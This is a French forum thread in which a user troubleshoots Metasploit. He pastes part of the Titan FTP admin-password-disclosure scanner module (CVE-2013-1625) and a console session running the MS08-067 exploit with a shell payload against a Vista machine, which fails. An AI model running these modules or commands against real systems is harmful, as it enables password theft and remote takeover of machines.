Metasploit, un peu d'aide ne me ferais pas de mal !!

316079 Messages postés 16 Statut Membre -  
316079 Messages postés 16 Statut Membre -
Bonjour,
je suis sous linux. J'ai installé Metasploit, afin de tester les différentes machines sur le réseau. (le réseau et les machines étant les miennes bien sur) Mais déjà au lancement de metasploit, il m'indique quelque chose d'étrange : une erreur de syntaxe dans le programme (du moins, je crois):

[-] WARNING! The following modules could not be loaded!
[-] /home/...-pc/metasploit/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb: SyntaxError compile error
/home/...-pc/metasploit/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb:40: syntax error, unexpected ')'

D'ou est-ce que cela provient ?

Merci d'avance

P.S : J'ai été vérifier au chemin indiqué, mais je ne trouve pas de parenthèse manquante.

4 réponses

Malekal_morte- Messages postés 184348 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   24 693
 
Salut,

Je vois pas trop comment on peux t'aider, vu qu'on a meme pas un aperçu du code.
Sinon supprime ou renomme le fichier en question pour ne pas que le module se charge.
0
316079 Messages postés 16 Statut Membre
 
Merci pour ta réponse,

Mais à quoi sert ce module ? (je ne veux pas le supprimer si je ne sais pas à quoi il sert ;))

Extrait du code :

include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report

def initialize
super(
'Name' => 'Titan FTP Administrative Password Disclosure',

'Author' =>
[
'Spencer McIntyre'
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-1625' ],
],
)

register_options([Opt::RPORT(31001)], self.class)
deregister_options('PASSWORD', 'USERNAME')
end

def run_host(ip)
res = send_request_cgi(
{
'uri' => "/admin.dll",
'method' => 'POST',
'headers' => {
'SRT-WantXMLResponses' => 'true',
'SRT-XMLRequest' => 'true',
'Authorization' => 'Basic FAKEFAKE'
},
'data' => "<SRRequest><SRTarget>DOM</SRTarget><SRAction>GCFG</SRAction><SRServerName/><SRPayload></SRPayload></SRRequest>",
})
return if not res

if res.code == 400
vprint_status("#{ip}:#{datastore['RPORT']} - Server Responeded 400, It's Likely Patched")
return
elsif res.code != 200
vprint_status("#{ip}:#{datastore['RPORT']} - Server Responeded With An Unknown Response Code Of #{res.code}")
return
end

xml_data = res.body.strip
resp_root = REXML::Document.new(xml_data).root

srresponse = resp_root.elements.to_a("//SRResponse")[0]
srdomainparams = srresponse.elements.to_a("//SRDomainParams")
[0]



Deuxième question, pourquoi dans le cas suivant ça ne fonctionne pas?

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST xxx.xxx.x.xxx (ip-victime)
RHOST => xxx.xxx.x.xxx
msf exploit(ms08_067_netapi) > set LHOST xxx.xxx.x.xxx (mon ip)
LHOST => xxx.xxx.x.xxx
msf exploit(ms08_067_netapi) > set payloads windows/shell/bind_tcp
payloads => windows/shell/bind_tcp
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on xxx.xxx.x.xxx:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows Vista Home Premium - (Build 6000) - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[-] Exploit failed [no-target]: No matching target


Que me manque-t-il ?? Quand je fais un show targets j'ai une liste de pays qui s'affiche.

Merci beaucoup d'avance ! :)

P.S: Et pourtant ça n'est pas faute de ne pas avoir chercher sur le net !!
0
dhelms
 
In / Home / ...-Pc / metasploit / modules / auxiliary / scanner / http / titan_ftp_admin_pwd.rb: 40: syntax error, unexpected ')'

Delete the comma at the end of line 39 and run it again
0
316079 Messages postés 16 Statut Membre
 
ok thanks for your answer.
I understand now the meening of the number "40" !!
0